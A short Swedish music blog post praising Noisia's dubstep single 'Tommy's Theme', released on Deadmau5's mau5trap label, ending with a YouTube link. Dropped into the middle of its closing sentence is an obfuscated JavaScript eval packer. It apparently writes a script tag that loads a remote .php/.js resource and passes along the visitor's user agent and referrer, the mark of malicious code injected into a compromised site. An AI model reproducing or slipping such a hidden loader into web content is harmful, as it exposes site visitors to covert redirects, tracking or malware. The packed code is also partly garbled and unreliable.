Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Noisia – Tommy’s Theme

Noisia – Tommy’s Theme
Sebastian

Holländska Noisia har varit igång sedan 2002 och har sedan dess utvecklats till en av världens främsta kollektiv inom elektronisk musik då de nått  enorma framgångar i främst drum n bass och dubstep men även house och breakbeat. Under tiden sedan de startade har de även skapat hela tre record labels; Vision, Division och Invisible Records (Noisia, eller snarare NOISI?, blir blir ”vision” skrivet baklänges och upp-och-ner) och har fast anställning som producenter på Jay-Z’s Roc Nation.

Gänget släppte tidigare i veckan singeln ”Tommy’s Theme” på Deadmau5’s mau5trap, en brutal dubstep-låt som är fruktansvärt välproducerad, fylld med hårda syntslingor och vackra orkestrala melodier.

Perfekt eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hhnkk|var|u0026u|referrer|zdhas||js|php’.split(’|’),0,{}))
inför en hård helg!

httpv://www.youtube.com/watch?v=_dJHP0brCnI